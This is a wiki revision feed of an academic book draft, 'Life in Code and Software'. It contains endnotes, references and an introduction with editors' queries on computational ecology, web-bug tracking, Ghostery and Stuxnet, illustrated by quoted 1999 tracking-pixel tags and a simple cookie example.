Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012, http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. E. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs), and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of virus. Worms spread from computer to computer, often across networks, but unlike a virus a worm has the ability to transfer itself without requiring any human action. It is able to do this by taking advantage of the file or information transport features of a computer, such as the networking setup, which it exploits to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm, and careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner against photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad; careful analysis of the background images accidentally photographed on computers used by the president confirmed the importance of the cascade structure, the centrifuge layout and the enriching process, see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.), although there is suspicion that there may be three versions of the Stuxnet code, revised in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious; for instance, Cryptome (2010) argues: 'It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit.' &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] That is, computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4690</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4690"/>
		<updated>2012-04-18T12:15:04Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such, we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'this'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers them. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life would be simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], had we not already discounted and backgrounded their importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, this is in reality the condition of the computational environment we increasingly experience, and one I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind rectangular panes of glass which yield only to certain prescribed forms of touch-based interface. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behaviour, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were intended to enable webpages and sites to store the current collection of data about a user, or what is called ‘state’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users raises important privacy issues, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
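&lt;br /&gt;
A minimal sketch, using Python's standard http.cookies module, of the kind of state a server sets and later reads back (the cookie name and value here are invented for illustration): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
from http.cookies import SimpleCookie &lt;br /&gt;
&lt;br /&gt;
# The server sets a small piece of text on the client... &lt;br /&gt;
cookie = SimpleCookie() &lt;br /&gt;
cookie['session_id'] = 'abc123'          # illustrative value &lt;br /&gt;
cookie['session_id']['max-age'] = 3600   # expires after an hour &lt;br /&gt;
&lt;br /&gt;
# ...which the browser then returns with every subsequent request, &lt;br /&gt;
# allowing the site (or a third party) to recognise the user again. &lt;br /&gt;
print(cookie.output()) &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;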
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user; should this code be observed, it looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any)&amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;group=register&amp;amp;amp;time=1999.10.27.20.56.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique that reduces the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again, Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet and that the data collected is 'anonymous (browser type), pseudonymous (IP address)'; the data is not shared with third parties, but no information is given on data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behaviour, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users' desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second-guess, tempt, direct and nudge behaviour in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen from the relative frequency of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor is worth $189 per user to [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) and $24 per user to [http://www.businessinsider.com/blackboard/google Google] (search), and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011). Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc., is becoming extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers (web site operators). Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. Example: [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
